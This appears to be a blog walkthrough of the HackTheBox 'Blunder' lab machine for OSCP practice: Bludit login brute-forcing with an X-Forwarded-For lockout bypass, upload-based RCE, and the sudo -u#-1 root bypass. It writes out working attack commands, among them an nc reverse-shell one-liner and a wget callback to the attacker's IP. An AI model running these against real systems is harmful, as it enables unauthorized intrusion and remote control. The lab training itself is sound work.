Road to OSCP 15: Blunder HackTheBox

Sharghaas
8 min read, May 5, 2024

Follow along in my OSCP journey; this is my target 15 of TJNULL's OSCP list.

How to use this walkthrough?

To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.191

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt.

PORT   STATE  SERVICE REASON         VERSION
21/tcp closed ftp reset ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Ok, so it seems like the path is quite straightforward as there is only 1 service that’s open.

Web — 80

First of all, the website just seems like a blog type template of interesting facts without many features to explore.

Nikto

Nikto is an old web scanner that is always good to run to get some quick info on the target. We get a lot of false positives around the admin page, but we do find a potentially interesting file: .gitignore

It seems that there are some remains of a git repo, let's explore.

We looked at those folders but nothing of value in the end

Let’s explore with a tool specialised in directory busting, gobuster.

gobuster dir -u http://10.10.10.191/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/0 (Status: 200) [Size: 7561]
/LICENSE (Status: 200) [Size: 1083]
/about (Status: 200) [Size: 3280]
/admin (Status: 301) [Size: 0]
/cgi-bin/ (Status: 301) [Size: 0]
/install.php (Status: 200) [Size: 30]
/robots.txt (Status: 200) [Size: 22]
/server-status (Status: 403) [Size: 277]
/todo.txt (Status: 200) [Size: 118]

There are a couple of interesting filenames on that list:

  • todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
  • install.php and /admin

/install.php is the first place we actually read the name of the installed app, and /admin gives us a login page as well.

HINT

We've explored most of the application; what are the logical paths we can take with a login screen and the name of an app?

.

.

.

.

It’s time for exploit research and possibly login bypass or login bruteforce.

Based on the page source and the searchsploit results it seems the Bludit version is 3.9.2.

The authenticated file upload seems like a nice vector (the exploits that lead to code execution all need valid credentials), so let's look at our enumeration for a username.

We also tried to read the credentials directly from the location the documentation describes, but we didn't have access.

We also have the user found in the todo notes: fergus.

We tried the Python brute-force script but couldn't fix its encoding issues, so we tried the Ruby option instead:

ruby 48746.rb -r http://10.10.10.191/admin/login.php -u fergus -w /usr/share/wordlists/rockyou.txt

But it doesn’t seem to work

HINT

Based on our current research most exploits for bludit require us to be authenticated, what other options than rockyou do we have?

.

.

.

.

That's right, we know what the owner loves, so let's create a custom wordlist with the topics he enjoys, using cewl.

# -d sets the crawl depth, -m the minimum word length
cewl -w customwordlist.txt -d 1 -m 7 http://10.10.10.191/0

Let’s run our bruteforce again with the new list:

ruby2.7 48746.rb -r http://10.10.10.191 -u fergus -w customwordlist.txt

Jackpot, let’s authenticate using fergus:RolandDeschain
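Why does a script get through when Bludit is supposed to lock an IP out after a few bad logins? The following in-process model is added for this write-up and is not Bludit's code or the 48746.rb script: it mirrors the shape of Bludit 3.9.2's lockout (failed logins are counted per "client IP" and the IP is blocked past a threshold) and the flaw the brute-forcer relies on, namely that the client IP is read from the X-Forwarded-For header when one is present. The failure threshold, the CSRF field regex, the candidate list and the target IP are assumptions; the real script fetches the login form for the CSRF token, then posts each candidate with a random X-Forwarded-For.

```python
"""Model of Bludit 3.9.2's login lockout and the X-Forwarded-For bypass.

Constructed model, not Bludit's code. Three runs are compared: the
vulnerable target without header spoofing (we get blocked), the vulnerable
target with spoofing (we find the password), and a hardened target that
keys the counter on the TCP peer address (spoofing no longer helps).
"""
import re
from dataclasses import dataclass, field

FAILURES_ALLOWED = 10   # assumption: failures per client IP before a block

# The login form carries a hidden tokenCSRF field; every POST must echo it,
# which is why the brute-force script requests the form first.
TOKEN_RE = re.compile(r'name="tokenCSRF"\s+value="([^"]+)"')


def extract_csrf_token(login_page_html: str) -> str:
    m = TOKEN_RE.search(login_page_html)
    if not m:
        raise ValueError("no tokenCSRF field in login page")
    return m.group(1)


@dataclass
class BluditLogin:
    """Minimal stand-in for the target's /admin/login endpoint."""
    username: str
    password: str
    trust_forwarded_for: bool = True    # True models 3.9.2, False the fix
    failures: dict = field(default_factory=dict)

    def client_ip(self, remote_addr: str, headers: dict) -> str:
        # Vulnerable behaviour: a client-controlled header wins over the
        # peer address the web server actually saw.
        if self.trust_forwarded_for and "X-Forwarded-For" in headers:
            return headers["X-Forwarded-For"]
        return remote_addr

    def post_login(self, remote_addr: str, headers: dict,
                   username: str, password: str) -> str:
        ip = self.client_ip(remote_addr, headers)
        if self.failures.get(ip, 0) >= FAILURES_ALLOWED:
            return "blocked"        # lockout page
        if username == self.username and password == self.password:
            return "dashboard"      # real app redirects to the dashboard
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return "incorrect"          # real app re-renders the login form


def brute_force(target: BluditLogin, username: str, wordlist,
                spoof_xff: bool, remote_addr: str = "10.10.14.46"):
    """Try each candidate. With spoof_xff every request carries a different
    X-Forwarded-For, so the per-IP counter never reaches the threshold.
    Returns (password, attempts) on success, (None, attempts) otherwise."""
    for attempt, candidate in enumerate(wordlist, start=1):
        headers = {}
        if spoof_xff:
            # Deterministic here for reproducibility; random works as well.
            headers["X-Forwarded-For"] = f"10.0.{(attempt >> 8) & 255}.{attempt & 255}"
        result = target.post_login(remote_addr, headers, username, candidate)
        if result == "dashboard":
            return candidate, attempt
        if result == "blocked":
            return None, attempt
    return None, len(wordlist)


# Constructed stand-in for the cewl output: 24 decoys, then the real one.
CANDIDATES = [f"Candidate{i}" for i in range(1, 25)] + ["RolandDeschain", "Wordlist26"]


if __name__ == "__main__":
    v = BluditLogin("fergus", "RolandDeschain")
    print("vulnerable, no spoofing:", brute_force(v, "fergus", CANDIDATES, spoof_xff=False))
    v = BluditLogin("fergus", "RolandDeschain")
    print("vulnerable, spoofing:   ", brute_force(v, "fergus", CANDIDATES, spoof_xff=True))
    p = BluditLogin("fergus", "RolandDeschain", trust_forwarded_for=False)
    print("hardened, spoofing:     ", brute_force(p, "fergus", CANDIDATES, spoof_xff=True))
```

The hardened variant is the actual lesson for defenders: rate limiting keyed on anything the client can set is not rate limiting. If the application sits behind a reverse proxy, the proxy should overwrite X-Forwarded-For and the application should only trust it from that proxy's address.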

We’re in!

Now that we're in, we realise there isn't much to explore inside the admin dashboard, so let's pivot to the other exploits. Reading the multiple/webapps/48701.txt exploit, we realise that the "directory traversal" in the image upload actually gives us RCE, not just traversal, and reading the exploit written for version 3.9.12 (php/webapps/48568.py) we realise we can use it against our version as well.

searchsploit -x multiple/webapps/48701.txt
searchsploit -x php/webapps/48568.py
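To see why a traversal in an upload handler turns into code execution, here is a constructed model added for this write-up (not Bludit's PHP and not the exploit script). Bludit builds the destination directory for an uploaded image from a request parameter (the published exploit abuses the uuid parameter) and joins it onto the uploads directory without checking that the result stays inside it, so ../ picks any writable directory. The exploit then drops a PHP payload with an image extension next to a .htaccess that maps that extension back to the PHP handler, and fetches it. The install path, the page-id format and the helper names below are assumptions.

```python
"""Vulnerable vs hardened destination-path construction for an image upload.

Constructed model for the Bludit traversal-to-RCE chain; paths and names are
assumptions, not values taken from the target.
"""
import os
import re

UPLOAD_ROOT = "/var/www/bludit/bl-content/uploads/pages"   # assumption
PAGE_ID_RE = re.compile(r"[A-Za-z0-9]+")
IMAGE_NAME_RE = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9_.-]*\.(png|jpe?g|gif)", re.I)

# What the public exploit stages next to the payload: Apache re-enables the
# PHP handler for .png inside that directory, so the "image" executes.
HTACCESS = "RewriteEngine off\nAddType application/x-httpd-php .png\n"


def vulnerable_upload_path(uuid: str, filename: str) -> str:
    """Vulnerable: the client-supplied directory component is trusted."""
    return os.path.normpath(os.path.join(UPLOAD_ROOT, uuid, filename))


def escapes_upload_root(path: str) -> bool:
    """True when a path no longer sits under UPLOAD_ROOT."""
    root = os.path.normpath(UPLOAD_ROOT)
    return os.path.commonpath([os.path.normpath(path), root]) != root


def hardened_upload_path(uuid: str, filename: str) -> str:
    """Hardened: whitelist the page id, keep only the base name, require an
    image extension that starts with a normal character (no dot-files such
    as .htaccess), and refuse anything that resolves outside UPLOAD_ROOT."""
    if not PAGE_ID_RE.fullmatch(uuid):
        raise ValueError(f"bad page id: {uuid!r}")
    safe_name = os.path.basename(filename)
    if not IMAGE_NAME_RE.fullmatch(safe_name):
        raise ValueError(f"bad image name: {filename!r}")
    root = os.path.realpath(UPLOAD_ROOT)
    dest = os.path.realpath(os.path.join(root, uuid, safe_name))
    if os.path.commonpath([dest, root]) != root:
        raise ValueError("destination escapes upload root")
    return dest


def hardened_accepts(uuid: str, filename: str) -> bool:
    try:
        hardened_upload_path(uuid, filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    evil = vulnerable_upload_path("../../tmp/temp", "evil.png")
    print("vulnerable writes to:", evil, "(escaped)" if escapes_upload_root(evil) else "")
    print("hardened accepts traversal:", hardened_accepts("../../tmp/temp", "evil.png"))
    print("hardened accepts .htaccess:", hardened_accepts("abc123", ".htaccess"))
    print("hardened accepts normal image:", hardened_accepts("abc123", "pic.png"))
```

The commonpath check after realpath() is the part worth copying: normalising the string is not enough on its own, because a symlinked component can still point outside the intended directory.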

We try to run it, without much success initially

python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "id"

HINT

When not having any outputs on our RCE attempts, what is a nice way to confirm if something is happening on the machine?

.

.

.

.

We want to test for blind execution. A nice way to do so is to run a command whose side effect we can observe from our own machine: a request to a web server we host (a simple file server is enough), or an ICMP ping captured with tcpdump.

updog -p 80
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "wget http://10.10.14.46/test"

We confirm we have blind RCE ❤

Let’s get a reverse shell

# reverse shell template; replace the IP and port with your own listener
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
python3 48568.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.46 4444 >/tmp/f"

For some reason the exploit isn’t super reliable, I had to run the same command a couple of times for it to work. We’re in baby!

Time for some shell upgrade 😉 We actually struggled to get a fully functional tty shell but thanks to this article we found a way https://zweilosec.github.io/posts/upgrade-linux-shell/

  1. In our kali terminal, before creating our listener, we actually type 'bash'
  2. which python python2 python3 (find out whether python2 or python3 is installed on the target)
  3. python -c 'import pty; pty.spawn("/bin/bash")'
  4. Ctrl+Z
  5. stty raw -echo
  6. fg, Enter, Enter

We are the www-data user, so we don’t have a user flag yet, let’s explore the application for some possible password.

We tried cracking the passwords unsuccessfully. Let's enumerate the users on the machine.

We look at /etc/passwd + /home and we have 2 users: hugo and shaun

Let’s explore the usual locations for interesting files that www-data could have permission to /opt/ /var/www

It seems that the newer version mentioned in the todo notes is already staged on disk, but the Apache config hasn't been switched over to it yet. Let's look at the same users file in that copy.

Let’s crack the password using crackstation

Let’s login as hugo:

Let’s get the user flag

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a db password or even a user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

Ok we do get a hit immediately with sudo -l

Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash

HINT

Does this mean we can just run sudo /bin/bash? Have you seen that !root syntax in a Runas specification before?

.

.

.

.

It seems we can run /bin/bash as any user but root, so let's do some digging.

Searching for that exact (ALL, !root) pattern turns up a known sudo bypass (CVE-2019-14287, fixed in sudo 1.8.28): asking for user id -1 passes the "not root" check but leaves the process running as uid 0. Let's open that up.

Let's give that a try. We fail at first as it seems we need a TTY shell; let's get that and try again:

sudo -u#-1 /bin/bash
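A small triage helper, added here and not part of the original write-up, that turns the two checks a pentester does by hand (is there a Runas spec of the form (ALL, !root), and is sudo older than 1.8.28?) into code. Before the fix, sudo accepted a numeric user id of -1 (or 4294967295) because it is not uid 0, but setresuid() treats -1 as "leave unchanged", so the command kept the uid 0 that the setuid sudo binary already had. The sudo -l text is the one from this box; the sudo -V output is a constructed sample, and the function names are mine.

```python
"""Does `sudo -u#-1` apply? Parses `sudo -l` and `sudo -V` output.

Added example; the version string below is constructed, not captured.
"""
import re

CVE_2019_14287_FIXED = (1, 8, 28)

# "(ALL, !root) /bin/bash" or "(ALL : ALL, !root) /bin/bash"
RUNAS_NOT_ROOT_RE = re.compile(
    r"\(\s*ALL\s*(?::\s*ALL\s*)?,\s*!root\s*\)\s*(?P<cmd>\S+)"
)


def parse_sudo_version(sudo_v_output: str) -> tuple:
    """(major, minor, patch) from the 'Sudo version x.y.z' line; the
    'pN' suffix is ignored because the fix landed in a full release."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("no 'Sudo version x.y.z' line found")
    return tuple(int(x) for x in m.groups())


def runas_rules_excluding_root(sudo_l_output: str) -> list:
    """Commands the caller may run as any user except root."""
    return [m.group("cmd") for m in RUNAS_NOT_ROOT_RE.finditer(sudo_l_output)]


def uid_minus_one_bypass(sudo_l_output: str, sudo_v_output: str):
    """Return the command to run when the bypass applies, else None."""
    cmds = runas_rules_excluding_root(sudo_l_output)
    if not cmds or parse_sudo_version(sudo_v_output) >= CVE_2019_14287_FIXED:
        return None
    return f"sudo -u#-1 {cmds[0]}"


# `sudo -l` as printed on the box.
SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""

# Constructed sample of `sudo -V` for a pre-fix build.
SUDO_V_OLD = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"


if __name__ == "__main__":
    print(uid_minus_one_bypass(SUDO_L, SUDO_V_OLD))
    print(uid_minus_one_bypass(SUDO_L, "Sudo version 1.8.31\n"))
```

Remember the page's own caveat: the shell you run this from needs to be a proper TTY, or sudo will not cooperate.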

What did I learn?

  1. How to go through exploits, read them and understand how to use them properly.
  2. How to create a fully usable TTY shell as the last part of the machine requires it to work.

Stream

I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.


Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together twitch.tv/sharghaas